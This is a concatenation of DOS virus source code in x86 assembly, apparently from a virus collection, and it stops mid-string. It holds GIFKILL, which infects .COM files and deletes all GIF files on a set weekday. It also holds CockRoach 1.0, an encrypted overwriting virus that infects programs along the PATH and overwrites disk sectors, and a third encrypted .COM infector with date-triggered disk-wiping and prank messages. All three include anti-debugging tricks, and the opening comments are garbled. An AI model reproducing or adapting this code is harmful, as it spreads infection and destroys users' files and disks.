mov al,dl xor al,3 xlat ret getcode: shr dx,1 mov al,79 jnc got or al,100b got: ret xlatdat db 0,4,0,0,4,0,26,0 db 2c,0,9,2,0,0,2,0 db 0e,0,4,4,2,0,0,3 db 0,0f,0,5,5,3,0,0 db 0,4,0,1 xlatbl1 db 0,1,2 xlatbl2 db 3,6,7 xlatbl3 db 7,4,5 chksum dw 1A03 ;è«¡▓░«½¡á ▒│¼á ¡á ó¿░│▒á. ; éìêîÇìêà! Æáº¿ ¬«¡▓░«½¡á ▒│¼á ▓░┐íóá ñá ▒Ñ ▒¼Ñ▓¡Ñ ¡á ░║¬á. Æ┐ ▒Ñ ▒¼┐▓á ¬á▓« ; ▒Ñ ÑXOR-¡á▓ ó▒¿╖¬¿ 16-í¿▓«ó¿ ñ│¼¿ ¼Ñªñ│ encrypt ¿ top. ü░«┐ ¿¼ ▓░┐íóá ñá í║ñÑ ; ¡Ñ╖Ñ▓¡« ╖¿▒½«, á «▒óÑ¡ ▓«óá ▒á¼¿┐ Ñ▓¿¬Ñ▓ chksum ▓░┐íóá ñá í║ñÑ ¡á ú░á¡¿╢á ¡á ; ñ│¼á. ä¿░Ñ¬▓¿ó¿▓Ñ errnz ó ¬░á┐ ¡á ┤á⌐½á «▒¿ú│░┐óá▓ ▓«óá. Ä▒óÑ¡ ▓«óá á¬« ¼Ñªñ│ ; encrypt ¿ top ¿¼á ¡┐¬á¬ó¿ ñá¡¡¿ ¿½¿ ¬«ñ ¬«¿▓« ▒Ñ »░«¼Ñ¡┐▓, ▓┐ ▓░┐íóá ñá ▒Ñ ; ▒¼┐▓á »« «»¿▒á¡¿┐ á½ú«░¿▓║¼ »░¿ ó▒┐¬« ºá░áº┐óá¡Ñ ¡á ┤á⌐½. ; Æ│¬ ▓░┐íóá ñá ▒Ñ ▒½«ª¿ «▒▓á¡á½á▓á ╖á▒▓ «▓ ó¿░│▒á ; . . . top: .errnz (encrypt-v_entry) mod 2 .errnz (top-encrypt) mod 4-2 .errnz (top-v_entry) mod 2 .errnz (chksum-v_entry) mod 2 muttbl db 7 dup(?) ;Éáí«▓¡á «í½á▒▓ ºá »«ñ»░«ú░á¼á▓á mutate end start done ; GIFKILL.ASM -- Seek and Destroy GIF ; Written by Dark Avenger virus_type equ 0 ; Appending Virus is_encrypted equ 1 ; We're encrypted tsr_virus equ 0 ; We're not TSR code segment byte public assume cs:code,ds:code,es:code,ss:code org 0100h main proc near db 0E9h,00h,00h ; Near jump (for compatibility) start: call find_offset ; Like a PUSH IP find_offset: pop bp ; BP holds old IP sub bp,offset find_offset ; Adjust for length of host call encrypt_decrypt ; Decrypt the virus start_of_code label near lea si,[bp + buffer] ; SI points to original start mov di,0100h ; Push 0100h on to stack for push di ; return to main program movsw ; Copy the first two bytes movsb ; Copy the third byte mov di,bp ; DI points to start of virus mov bp,sp ; BP points to stack sub sp,128 ; Allocate 128 bytes on stack mov ah,02Fh ; DOS get DTA function int 021h push bx ; Save old DTA address on stack mov ah,01Ah ; DOS set DTA function lea dx,[bp - 128] ; DX points to buffer on stack int 021h stop_tracing: mov cx,09EBh mov ax,0FE05h ; Acutal move, plus a HaLT jmp $-2 add ah,03Bh ; AH now equals 025h jmp $-10 ; Execute the HaLT lea bx,[di + null_vector] ; BX points to new routine push cs ; Transfer CS into ES pop es ; using a PUSH/POP int 021h mov al,1 ; Disable interrupt 1, too int 021h jmp short skip_null ; Hop over the loop null_vector: jmp $ ; An infinite loop skip_null: mov byte ptr [di + lock_keys + 1],130 ; Prefetch unchanged lock_keys: mov al,128 ; Change here screws DEBUG out 021h,al ; If tracing then lock keyboard mov cx,0003h ; Do 3 infections search_loop: push cx ; Save CX call search_files ; Find and infect a file pop cx ; Restore CX loop search_loop ; Repeat until CX is 0 call get_weekday cmp ax,0005h ; Did the function return 5? je strt00 ; If equal, do effect jmp end00 ; Otherwise skip over it strt00: lea dx,[di + data00] ; DX points to data mov ah,04Eh ; DOS find first file function mov cx,00100111b ; All file attributes valid int 021h jc erase_done ; Exit procedure on failure mov ah,02Fh ; DOS get DTA function int 021h lea dx,[bx + 01Eh] ; DX points to filename in DTA erase_loop: mov ah,041h ; DOS delete file function int 021h mov ah,03Ch ; DOS create file function xor cx,cx ; No attributes for new file int 021h mov ah,041h ; DOS delete file function int 021h mov ah,04Fh ; DOS find next file function int 021h jnc erase_loop ; Repeat until no files left erase_done: end00: com_end: pop dx ; DX holds original DTA address mov ah,01Ah ; DOS set DTA function int 021h mov sp,bp ; Deallocate local buffer xor ax,ax ; mov bx,ax ; mov cx,ax ; mov dx,ax ; Empty out the registers mov si,ax ; mov di,ax ; mov bp,ax ; ret ; Return to original program main endp db 0FAh,045h,02Eh,0B3h,024h search_files proc near push bp ; Save BP mov bp,sp ; BP points to local buffer sub sp,64 ; Allocate 64 bytes on stack mov ah,047h ; DOS get current dir function xor dl,dl ; DL holds drive # (current) lea si,[bp - 64] ; SI points to 64-byte buffer int 021h mov ah,03Bh ; DOS change directory function lea dx,[di + root] ; DX points to root directory int 021h call traverse ; Start the traversal mov ah,03Bh ; DOS change directory function lea dx,[bp - 64] ; DX points to old directory int 021h mov sp,bp ; Restore old stack pointer pop bp ; Restore BP ret ; Return to caller root db "\",0 ; Root directory search_files endp traverse proc near push bp ; Save BP mov ah,02Fh ; DOS get DTA function int 021h push bx ; Save old DTA address mov bp,sp ; BP points to local buffer sub sp,128 ; Allocate 128 bytes on stack mov ah,01Ah ; DOS set DTA function lea dx,[bp - 128] ; DX points to buffer int 021h mov ah,04Eh ; DOS find first function mov cx,00010000b ; CX holds search attributes lea dx,[di + all_files] ; DX points to "*.*" int 021h jc leave_traverse ; Leave if no files present check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory? jne another_dir ; If not, try again cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."? je another_dir ;If so, keep going mov ah,03Bh ; DOS change directory function lea dx,[bp - 98] ; DX points to new directory int 021h call traverse ; Recursively call ourself pushf ; Save the flags mov ah,03Bh ; DOS change directory function lea dx,[di + up_dir] ; DX points to parent directory int 021h popf ; Restore the flags jnc done_searching ; If we infected then exit another_dir: mov ah,04Fh ; DOS find next function int 021h jnc check_dir ; If found check the file leave_traverse: lea dx,[di + com_mask] ; DX points to "*.COM" call find_files ; Try to infect a file done_searching: mov sp,bp ; Restore old stack frame mov ah,01Ah ; DOS set DTA function pop dx ; Retrieve old DTA address int 021h pop bp ; Restore BP ret ; Return to caller up_dir db "..",0 ; Parent directory name all_files db "*.*",0 ; Directories to search for com_mask db "*.COM",0 ; Mask for all .COM files traverse endp db 0A6h,03Ch,0B6h,078h,0CCh find_files proc near push bp ; Save BP mov ah,02Fh ; DOS get DTA function int 021h push bx ; Save old DTA address mov bp,sp ; BP points to local buffer sub sp,128 ; Allocate 128 bytes on stack push dx ; Save file mask mov ah,01Ah ; DOS set DTA function lea dx,[bp - 128] ; DX points to buffer int 021h mov ah,04Eh ; DOS find first file function mov cx,00100111b ; CX holds all file attributes pop dx ; Restore file mask find_a_file: int 021h jc done_finding ; Exit if no files found call infect_file ; Infect the file! jnc done_finding ; Exit if no error mov ah,04Fh ; DOS find next file function jmp short find_a_file ; Try finding another file done_finding: mov sp,bp ; Restore old stack frame mov ah,01Ah ; DOS set DTA function pop dx ; Retrieve old DTA address int 021h pop bp ; Restore BP ret ; Return to caller find_files endp db 002h,0EFh,034h,048h,091h infect_file proc near mov ah,02Fh ; DOS get DTA address function int 021h mov si,bx ; SI points to the DTA mov byte ptr [di + set_carry],0 ; Assume we'll fail cmp word ptr [si + 01Ah],(65279 - (finish - start)) jbe size_ok ; If it's small enough continue jmp infection_done ; Otherwise exit size_ok: mov ax,03D00h ; DOS open file function, r/o lea dx,[si + 01Eh] ; DX points to file name int 021h xchg bx,ax ; BX holds file handle mov ah,03Fh ; DOS read from file function mov cx,3 ; CX holds bytes to read (3) lea dx,[di + buffer] ; DX points to buffer int 021h mov ax,04202h ; DOS file seek function, EOF cwd ; Zero DX _ Zero bytes from end mov cx,dx ; Zero CX / int 021h xchg dx,ax ; Faster than a PUSH AX mov ah,03Eh ; DOS close file function int 021h xchg dx,ax ; Faster than a POP AX sub ax,finish - start + 3 ; Adjust AX for a valid jump cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet? je infection_done ; If equal then exit mov byte ptr [di + set_carry],1 ; Success -- the file is OK add ax,finish - start ; Re-adjust to make the jump mov word ptr [di + new_jump + 1],ax ; Construct jump mov ax,04301h ; DOS set file attrib. function xor cx,cx ; Clear all attributes lea dx,[si + 01Eh] ; DX points to victim's name int 021h mov ax,03D02h ; DOS open file function, r/w int 021h xchg bx,ax ; BX holds file handle mov ah,040h ; DOS write to file function mov cx,3 ; CX holds bytes to write (3) lea dx,[di + new_jump] ; DX points to the jump we made int 021h mov ax,04202h ; DOS file seek function, EOF cwd ; Zero DX _ Zero bytes from end mov cx,dx ; Zero CX / int 021h push si ; Save SI through call call encrypt_code ; Write an encrypted copy pop si ; Restore SI mov ax,05701h ; DOS set file time function mov cx,[si + 016h] ; CX holds old file time mov dx,[si + 018h] ; DX holds old file date int 021h mov ah,03Eh ; DOS close file function int 021h mov ax,04301h ; DOS set file attrib. function xor ch,ch ; Clear CH for file attribute mov cl,[si + 015h] ; CX holds file's old attributes lea dx,[si + 01Eh] ; DX points to victim's name int 021h infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed ret ; Return to caller set_carry db ? ; Set-carry-on-exit flag buffer db 090h,0CDh,020h ; Buffer to hold old three bytes new_jump db 0E9h,?,? ; New jump to virus infect_file endp db 089h,043h,03Bh,054h,0AAh get_weekday proc near mov ah,02Ah ; DOS get date function int 021h cbw ; Sign-extend AL into AX ret ; Return to caller get_weekday endp data00 db "*.GIF",0 vcl_marker db "[Z10]",0 ; VCL creation marker note db "Bye Bye Mr.GIF",0 db "You'll never find all the file" db "s I have infected!",0 encrypt_code proc near push bp ; Save BP mov bp,di ; Use BP as pointer to code lea si,[bp + encrypt_decrypt]; SI points to cipher routine xor ah,ah ; BIOS get time function int 01Ah mov word ptr [si + 9],dx ; Low word of timer is new key xor byte ptr [si + 1],8 ; xor byte ptr [si + 8],1 ; Change all SIs to DIs xor word ptr [si + 11],0101h; (and vice-versa) lea di,[bp + finish] ; Copy routine into heap mov cx,finish - encrypt_decrypt - 1 ; All but final RET push si ; Save SI for later push cx ; Save CX for later rep movsb ; Copy the bytes lea si,[bp + write_stuff] ; SI points to write stuff mov cx,5 ; CX holds length of write rep movsb ; Copy the bytes pop cx ; Restore CX pop si ; Restore SI inc cx ; Copy the RET also this time rep movsb ; Copy the routine again mov ah,040h ; DOS write to file function lea dx,[bp + start] ; DX points to virus lea si,[bp + finish] ; SI points to routine call si ; Encrypt/write/decrypt mov di,bp ; DI points to virus again pop bp ; Restore BP ret ; Return to caller write_stuff: mov cx,finish - start ; Length of code int 021h encrypt_code endp end_of_code label near encrypt_decrypt proc near lea si,[bp + start_of_code] ; SI points to code to decrypt mov cx,(end_of_code - start_of_code) / 2 ; CX holds length xor_loop: db 081h,034h,00h,00h ; XOR a word by the key inc si ; Do the next word inc si ; loop xor_loop ; Loop until we're through ret ; Return to caller encrypt_decrypt endp finish label near code ends end main done virus_type equ 1 ; Overwriting Virus is_encrypted equ 1 ; We're encrypted tsr_virus equ 0 ; We're not TSR code segment byte public assume cs:code,ds:code,es:code,ss:code org 0100h start label near main proc near flag: cmp dx,0 xchg dx,ax call encrypt_decrypt ; Decrypt the virus start_of_code label near stop_tracing: mov cx,09EBh mov ax,0FE05h ; Acutal move, plus a HaLT jmp $-2 add ah,03Bh ; AH now equals 025h jmp $-10 ; Execute the HaLT mov bx,offset null_vector ; BX points to new routine push cs ; Transfer CS into ES pop es ; using a PUSH/POP int 021h mov al,1 ; Disable interrupt 1, too int 021h jmp short skip_null ; Hop over the loop null_vector: jmp $ ; An infinite loop skip_null: mov byte ptr [lock_keys + 1],130 ; Prefetch unchanged lock_keys: mov al,128 ; Change here screws DEBUG out 021h,al ; If tracing then lock keyboard mov cx,0007h ; Do 7 infections search_loop: push cx ; Save CX call search_files ; Find and infect a file pop cx ; Restore CX loop search_loop ; Repeat until CX is 0 mov bx,0001h ; First argument is 1 mov si,0002h ; Second argument is 2 push es ; Save ES xor ax,ax ; Set the extra segment to mov es,ax ; zero (ROM BIOS) shl bx,1 ; Convert to word index shl si,1 ; Convert to word index mov ax,word ptr [bx + 03FEh]; Zero COM port address xchg word ptr [si + 03FEh],ax; Put first value in second, mov word ptr [bx + 03FEh],ax; and second value in first! pop es ; Restore ES mov ax,0002h ; First argument is 2 mov cx,0096h ; Second argument is 150 cli ; Disable interrupts (no Ctrl-C) cwd ; Clear DX (start with sector 0) trash_loop: int 026h ; DOS absolute write interrupt dec ax ; Select the previous disk cmp ax,-1 ; Have we gone too far? jne trash_loop ; If not, repeat with new drive sti ; Restore interrupts mov ax,04C00h ; DOS terminate function int 021h main endp db 036h,0D6h,0D4h,0E6h,029h search_files proc near push bp ; Save BP mov bp,sp ; BP points to local buffer sub sp,135 ; Allocate 135 bytes on stack mov byte ptr [bp - 135],'\' ; Start with a backslash mov ah,047h ; DOS get current dir function xor dl,dl ; DL holds drive # (current) lea si,[bp - 134] ; SI points to 64-byte buffer int 021h call traverse_path ; Start the traversal traversal_loop: cmp word ptr [path_ad],0 ; Was the search unsuccessful? je done_searching ; If so then we're done call found_subdir ; Otherwise copy the subdirectory mov ax,cs ; AX holds the code segment mov ds,ax ; Set the data and extra mov es,ax ; segments to the code segment xor al,al ; Zero AL stosb ; NULL-terminate the directory mov ah,03Bh ; DOS change directory function lea dx,[bp - 70] ; DX points to the directory int 021h mov dx,offset com_mask ; DX points to "*.COM" call find_files ; Try to infect a .COM file jnc done_searching ; If successful the exit mov dx,offset exe_mask ; DX points to "*.EXE" call find_files ; Try to infect an .EXE file jnc done_searching ; If successful the exit jmp short traversal_loop ; Keep checking the PATH done_searching: mov ah,03Bh ; DOS change directory function lea dx,[bp - 135] ; DX points to old directory int 021h cmp word ptr [path_ad],0 ; Did we run out of directories? jne at_least_tried ; If not then exit stc ; Set the carry flag for failure at_least_tried: mov sp,bp ; Restore old stack pointer pop bp ; Restore BP ret ; Return to caller com_mask db "*.COM",0 ; Mask for all .COM files exe_mask db "*.EXE",0 ; Mask for all .EXE files search_files endp traverse_path proc near mov es,word ptr cs:[002Ch] ; ES holds the enviroment segment xor di,di ; DI holds the starting offset find_path: mov si,offset path_string ; SI points to "PATH=" lodsb ; Load the "P" into AL mov cx,08000h ; Check the first 32767 bytes repne scasb ; Search until the byte is found mov cx,4 ; Check the next four bytes check_next_4: lodsb ; Load the next letter of "PATH=" scasb ; Compare it to the environment jne find_path ; If there not equal try again loop check_next_4 ; Otherwise keep checking mov word ptr [path_ad],di ; Save the PATH address for later mov word ptr [path_ad + 2],es ; Save PATH's segment for later ret ; Return to caller path_string db "PATH=" ; The PATH string to search for path_ad dd ? ; Holds the PATH's address traverse_path endp found_subdir proc near lds si,dword ptr [path_ad] ; DS:SI points to the PATH lea di,[bp - 70] ; DI points to the work buffer push cs ; Transfer CS into ES for pop es ; byte transfer move_subdir: lodsb ; Load the next byte into AL cmp al,';' ; Have we reached a separator? je moved_one ; If so we're done copying or al,al ; Are we finished with the PATH? je moved_last_one ; If so get out of here stosb ; Store the byte at ES:DI jmp short move_subdir ; Keep transfering characters moved_last_one: xor si,si ; Zero SI to signal completion moved_one: mov word ptr es:[path_ad],si; Store SI in the path address ret ; Return to caller found_subdir endp db 010h,08Eh,0B5h,016h,002h find_files proc near push bp ; Save BP mov ah,02Fh ; DOS get DTA function int 021h push bx ; Save old DTA address mov bp,sp ; BP points to local buffer sub sp,128 ; Allocate 128 bytes on stack push dx ; Save file mask mov ah,01Ah ; DOS set DTA function lea dx,[bp - 128] ; DX points to buffer int 021h mov ah,04Eh ; DOS find first file function mov cx,00100111b ; CX holds all file attributes pop dx ; Restore file mask find_a_file: int 021h jc done_finding ; Exit if no files found call infect_file ; Infect the file! jnc done_finding ; Exit if no error mov ah,04Fh ; DOS find next file function jmp short find_a_file ; Try finding another file done_finding: mov sp,bp ; Restore old stack frame mov ah,01Ah ; DOS set DTA function pop dx ; Retrieve old DTA address int 021h pop bp ; Restore BP ret ; Return to caller find_files endp db 0FDh,052h,0B3h,06Ah,08Ch infect_file proc near mov ah,02Fh ; DOS get DTA address function int 021h mov si,bx ; SI points to the DTA mov byte ptr [set_carry],0 ; Assume we'll fail cmp word ptr [si + 01Ch],0 ; Is the file > 65535 bytes? jne infection_done ; If it is then exit cmp word ptr [si + 025h],'DN' ; Might this be COMMAND.COM? je infection_done ; If it is then skip it cmp word ptr [si + 01Ah],(finish - start) jb infection_done ; If it's too small then exit mov ax,03D00h ; DOS open file function, r/o lea dx,[si + 01Eh] ; DX points to file name int 021h xchg bx,ax ; BX holds file handle mov ah,03Fh ; DOS read from file function mov cx,4 ; CX holds bytes to read (4) mov dx,offset buffer ; DX points to buffer int 021h mov ah,03Eh ; DOS close file function int 021h push si ; Save DTA address before compare mov si,offset buffer ; SI points to comparison buffer mov di,offset flag ; DI points to virus flag mov cx,4 ; CX holds number of bytes (4) rep cmpsb ; Compare the first four bytes pop si ; Restore DTA address je infection_done ; If equal then exit mov byte ptr [set_carry],1 ; Success -- the file is OK mov ax,04301h ; DOS set file attrib. function xor cx,cx ; Clear all attributes lea dx,[si + 01Eh] ; DX points to victim's name int 021h mov ax,03D02h ; DOS open file function, r/w int 021h xchg bx,ax ; BX holds file handle push si ; Save SI through call call encrypt_code ; Write an encrypted copy pop si ; Restore SI mov ax,05701h ; DOS set file time function mov cx,[si + 016h] ; CX holds old file time mov dx,[si + 018h] ; DX holds old file date int 021h mov ah,03Eh ; DOS close file function int 021h mov ax,04301h ; DOS set file attrib. function xor ch,ch ; Clear CH for file attribute mov cl,[si + 015h] ; CX holds file's old attributes lea dx,[si + 01Eh] ; DX points to victim's name int 021h infection_done: cmp byte ptr [set_carry],1 ; Set carry flag if failed ret ; Return to caller buffer db 4 dup (?) ; Buffer to hold test data set_carry db ? ; Set-carry-on-exit flag infect_file endp vcl_marker db "[VCL]",0 ; VCL creation marker note db "CockRoach 1.0 Virus" db "By Anonymous Caller" db "[LegenD] Systems 1992!" encrypt_code proc near mov si,offset encrypt_decrypt; SI points to cipher routine xor ah,ah ; BIOS get time function int 01Ah mov word ptr [si + 8],dx ; Low word of timer is new key xor byte ptr [si],1 ; xor byte ptr [si + 7],1 ; Change all SIs to DIs xor word ptr [si + 10],0101h; (and vice-versa) mov di,offset finish ; Copy routine into heap mov cx,finish - encrypt_decrypt - 1 ; All but final RET push si ; Save SI for later push cx ; Save CX for later rep movsb ; Copy the bytes mov si,offset write_stuff ; SI points to write stuff mov cx,5 ; CX holds length of write rep movsb ; Copy the bytes pop cx ; Restore CX pop si ; Restore SI inc cx ; Copy the RET also this time rep movsb ; Copy the routine again mov ah,040h ; DOS write to file function mov dx,offset start ; DX points to virus call finish ; Encrypt/write/decrypt ret ; Return to caller write_stuff: mov cx,finish - start ; Length of code int 021h encrypt_code endp end_of_code label near encrypt_decrypt proc near mov si,offset start_of_code ; SI points to code to decrypt mov cx,(end_of_code - start_of_code) / 2 ; CX holds length xor_loop: db 081h,034h,00h,00h ; XOR a word by the key inc si ; Do the next word inc si ; loop xor_loop ; Loop until we're through ret ; Return to caller encrypt_decrypt endp finish label near code ends end main done code segment word public 'code' assume cs:code,ds:code org 100h main proc;edure ;EQUates... idc equ 69h ;ID character - (note: 69) cr equ 13 ;ASCII for carriage return lf equ 10 ;ASCII for line feed ;End codes. These determine what happens after the string is displayed. terminate equ 0 ;Terminate program after display halt equ 1 ;Cause the system to hang after display SimulateCritErr equ 2 ;Simulate the critical error handler return2host equ 3 ;Resume program immediately FlashFloppy equ 4 ;Wait for a key, then reset Drive A: WaitKey equ 5 ;Wait for a key, then resume program PauseKey equ 6 ;Same thing, but uses a pause message StackError equ 7 ;Cause a stack overflow (halts system) tof: ;Top-Of-File jmp begin ;Skip over program idchar: db idc ;ID character HostProgram: nop ;First run copy only! nop ;First run copy only! first_four: nop ;First run copy only! address: int 20h ;First run copy only! check: nop ;First run copy only! begin: call nextline ;Push IP+3 onto stack nextline: pop bp ;mov bp,ip sub bp,offset nextline ;bp=disp. for mem locs push ax ;Save AX call cryptor ;Decrypt jmp short retloc ;Continue program cryptor: mov al,[bp+offset encrypt_val] ;encrypt val lea si,[bp+offset toec] ;Top Of Encrypted Code mov cx,offset eoec-offset toec ;Length of " " cryptorloop: xor [si],al ;en/de crypt rol al,cl ;change code # inc si ;Next char please! loop cryptorloop ;loop if necessary ret ;Return to caller infect: call cryptor ;Encrypt code pop cx ;Restore CX for INT 21 int 21h ;Call DOS call cryptor ;Decrypt code ret ;Go back toec:;───────────────────────────────────────────────────Top Of Encrypted Code InfectIt: push cx ;Save CX for sub jmp infect retloc: pop ax ;Restore AX xor di,di ;DI = 0 cli ;Disable interrupts mov ss,di ;Set up stack at: mov sp,2F0h ; 0000:02F0 sti ;Enable interrupts mov si,96h ;Vector for INT 24h mov bx,ss:[si] ;BX = offset in segment mov cx,ss:[si+2] ;CX = segment lea dx,[bp+offset int24handler] ;CS:DX -} local handler mov ss:[si],DX ;Save offset mov ss:[si+2],cs ;Save segment mov si,es:[di+2F8h] ;Check operation mode cmp si,4643h ;'CF' if already TSRed jne GoOn ;Nope, jmp jmp return ;Yes, don't do anything GoOn: mov cs:[di+4Ch],bx ;use unused part of PSP mov cs:[di+4Eh],cx ; to save BX and CX push cs ;Copy CS ... pop es ; ... to DS mov byte ptr [bp+offset infected],0 ;Reset infection count mov byte ptr [bp+offset max2kill],3 ;Stop after 3 or less GoOn2: lea si,[bp+offset first_four] ;Original first 4 bytes mov di,offset tof ;TOF never changes cld ;Read left-to-right movsw ;Copy the 4 bytes movsw ;Copy the 4 bytes mov ah,1Ah ;Set DTA address ... lea dx,[bp+offset DTA] ; ... to *our* DTA int 21h ;Call DOS to set DTA mov ah,4Eh ;Find First ASCIIZ lea dx,[bp+offset filespec] ;DS:DX -} '*.COM',0 lea si,[bp+offset filename] ;Point to file push dx ;Save DX jmp short continue ;Continue... return: mov ah,1ah ;Set DTA address ... mov dx,80h ; ... to default DTA int 21h ;Call DOS to set DTA xor di,di ;DI= 0 mov es,di ;ES= 0 mov si,96h ;Vector for INT 24h mov bx, cs:[di+4Ch] ;Restore from saved BX mov word ptr es:[si+0], bx ;Place back into vector mov cx, cs:[di+4Eh] ;Restore from saved CX mov word ptr es:[si+2], cx ;Place back into vector push cs ;Move CS ... pop es ; ... to ES mov ax,[bp+offset SavedAX] ;Restore AX xor bx,bx ;BX= 0 mov cx,bx ;CX= 0 mov dx,cx ;DX= 0 mov si,dx ;SI= 0 mov di,si ;DI= 0 mov sp,0FFFEh ;SP= FFFEh (normal) mov bp,100h ;BP= 100h (RETurn addr) push bp ; Put on stack mov bp,ax ;BP= 0 ret ;JMP to 100h nextfile: or bx,bx ;Did we open the file? jz skipclose ;No, so don't close it mov ah,3Eh ;Close file int 21h ;Call DOS to close it xor bx,bx ;Set BX back to 0 skipclose: mov ah,4Fh ;Find Next ASCIIZ continue: pop dx ;Restore DX push dx ;Re-save DX xor cx,cx ;CX= 0 xor bx,bx int 21h ;Find First/Next jnc skipjmp jmp NoneLeft ;Out of files skipjmp: mov ax,3D02h ;open file mov dx,si ;point to filespec int 21h ;Call DOS to open file jc nextfile ;Next file if error mov bx,ax ;get the handle mov ah,3Fh ;Read from file mov cx,4 ;Read 4 bytes lea dx,[bp+offset first_four] ;Read in the first 4 int 21h ;Call DOS to read cmp byte ptr [bp+offset check],idc ;Already infected? je nextfile ;Yep, try again ... ;NOTE: Delete the two lines above if you want it to re-infected programs. cmp byte ptr [bp+offset first_four],77 ;Mis-named .EXE? je nextfile ;Yep, maybe next time! mov ax,4202h ;LSeek to EOF xor cx,cx ;CX= 0 xor dx,dx ;DX= 0 int 21h ;Call DOS to LSeek cmp ah,0F8h ;Longer than 62K? ja nextfile ;Yep, try again... mov [bp+offset addr],ax ;Save call location mov ah,40h ;Write to file mov cx,4 ;Write 4 bytes lea dx,[bp+offset first_four] ;Point to buffer int 21h ;Save the first 4 bytes mov ah,[bp+offset encrypt_val] ;Get code number inc ah ;add 1 adc ah,0 ;increment if it's zero mov [bp+offset encrypt_val],ah ;Save new code number mov ah,40h ;Write to file mov cx,offset eof-offset begin ;Length of target code lea dx,[bp+offset begin] ;Point to virus start call InfectIt ;Exempt from encryption ComeBackHere: mov ax,4200h ;LSeek to TOF xor cx,cx ;CX= 0 xor dx,dx ;DX= 0 int 21h ;Call DOS to LSeek mov ax,[bp+offset addr] ;Retrieve location inc ax ;Adjust location mov [bp+offset address],ax ;address to call mov byte ptr [bp+offset first_four],0E9h ;JMP rel16 inst. mov byte ptr [bp+offset check],idc ;EOFMARK mov ah,40h ;Write to file mov cx,4 ;Write 4 bytes lea dx,[bp+offset first_four] ;4 bytes are at [DX] int 21h ;Write to file inc byte ptr [bp+offset infected] ;increment counter dec byte ptr [bp+offset max2kill] ;decrement counter jz TheEnd ;If 0 then End inc byte ptr [bp+offset encrypt_val] ;change code # adc byte ptr [bp+offset encrypt_val],0 ;adjust if 0 jmp nextfile ;Next victim! NoneLeft: cmp byte ptr [bp+offset infected],3 ;At least 3 infected? jae TheEnd ;The party's over! mov di,100h ;DI= 100h cmp word ptr [di],20CDh ;an INT 20h? je TheEnd ;Don't go to prev. dir. lea dx,[bp+offset prevdir] ;'..' mov ah,3Bh ;Set current directory int 21h ;CHDIR .. jc TheEnd ;We're through! mov ah,4Eh jmp continue ;Start over in new dir TheEnd: xor di,di ;DI= 0 mov es,di ;ES= 0 mov ah,2ah ;Get date int 21h ;Do it cmp dl,4 ;4th of the month? jne test2 ;Nope, second test cmp dh,7 ;July? jne test2 ;Nope, second test xor ax,ax ;Sector 0 jmp Kill ;Kill the disk now... test2: mov ah,2ch ;Get time int 21h ;Do it or cl,cl ;On the hour? (x:00 xM) jnz GiveUp ;Return to program cmp ch,6 ;Midnight to 5 AM ??? jnl GiveUp ;Return to program add cl,ch ;Add first number mov ax,cx ;Transfer to AX cbw ;Zero out AH add al,dh ;Add DL to AL adc al,dl ;Add DL and carry flag adc ah,0 ;Add carry to AH or ax,ax ;AX = 0 ??? jnz Kill ;Kill the disk now... inc ax ;Well, adjust first... Kill: mov dx,ax ;Sector number mov cx,1 ;One at a time.... xor bx,bx ;Point at PSP mov ah,19h ;Get current disk int 21h ;Call DOS to ^ int 26h ;Now kill the disk GiveUp: mov bx,offset message_table ;point to table mov ah,2ch ;Get time int 21h ;Call DOS to ^ inc dh ;(0-59) timeloop: cmp dh,msgs ;mapped yet? jl timedone ;Yes, jump sub dh,msgs ;try to map it jmp short timeloop ;and check out work timedone: mov al,dh ;AL gets msg # mov cl,al ;Save in CL for CritErr cbw ;AH gets 0 shl ax,1 ;AX = AX * 2 add bx,ax ;BX = index mov si,[bx] ;SI points to string mov ch,[si-1] ;CH is technique # mov dx,si ;DX points to string mov ah,9 ;Display string int 21h ;Call DOS to ^ cmp ch,terminate ;Terminate program? je TerminateProg ;Nope, next test cmp ch,halt ;Halt program? je $ ;Hang system if ch=halt cmp ch,SimulateCritErr ;Simulate CritErr? je simulate ;yes, go do it cmp ch,Return2host ;Return to host? je ResumeProgram ;yes, go do it cmp ch,FlashFloppy ;Flash drive A:? je FlashFlop ;Yes, go do it cmp ch,WaitKey ;Wait for keypress? je zwait ;Yes, go do it cmp ch,PauseKey ;Pause message w/ wait? je zpause ;Yes, go do it cmp ch,StackError ;Stack overflow? je StackErr ;Yes, go do it ;Invalid code, assume Return2host ResumeProgram: jmp return ;Return to caller StackErr: call $ ;Cause stack overflow TerminateProg: int 20h ;Yep, all done! simulate: lea dx,[bp+offset ARIFmsg] ;Abort, Retry ... mov ah,9 ;Print string int 21h ;Call DOS to ^ mov ah,1 ;Input a char int 21h ;Call DOS to ^ lea dx,[bp+offset crlf] ;crlf mov ah,9 ;Print string int 21h ;Call DOS to ^ cmp al,'a' ;Uppercase? jb uppercase ;Nope, jump sub al,' ' ;Yes, make uppercase uppercase: cmp al,'A' ;Abort? je terminateprog ;Yep, go do it. cmp al,'R' ;Retry? jne zskip ;skip over "retry" code lea dx,[bp+offset crlf] ;Point to crlf mov ah,9 ;Print string int 21h ;Call DOS to ^ mov dh,cl ;Restore DH from CL jmp timedone ;Reprint error zskip: cmp al,'I' ;Ignore? je ResumeProgram ;Return to host program cmp al,'F' ;Fail? jne simulate ;Invalid response lea dx,[bp+offset fail24] ;Point to fail string mov ah,9 ;Print string int 21h ;Call DOS to ^ int 20h ;Terminate program FlashFlop: mov ah,1 ;Wait for keypress int 21h ;Call DOS to ^ xor ax,ax ;Drive A: mov cx,1 ;Read 1 sector mov dx,ax ;Start at boot sector lea bx,[bp+offset boot_sector] ;BX points to buffer int 25h ;Flash light on A: jmp short ResumeProgram ;Resume if no error zpause: lea dx,[bp+offset pause] ;Point to pause message mov ah,9 ;Print string int 21h ;Call DOS to ^ zwait: mov ah,1 ;Wait for keypress int 21h ;Call DOS to ^ jmp short ResumeProgram ;Go on... ARIFmsg db cr,lf,'Abort, Retry, Ignore, Fail?$' fail24 db cr,lf,cr,lf,'Fail on INT 24' crlf db cr,lf,'$' message_table: dw offset msg1 dw offset msg2 dw offset msg3 dw offset msg4 dw offset msg5 dw offset msg6 dw offset msg7 dw offset msg8 dw offset msg9 dw offset msg10 dw offset msg11 dw offset msg12 dw offset msg13 dw offset msg14 dw offset msg15 dw offset msg16 dw offset msg17 dw offset msg18 dw offset msg19 dw offset msg20 msgs db 20 db FlashFloppy ;Waits for key, then flashes drive A: msg5 db 'I',39,'m hungry! Insert PIZZA 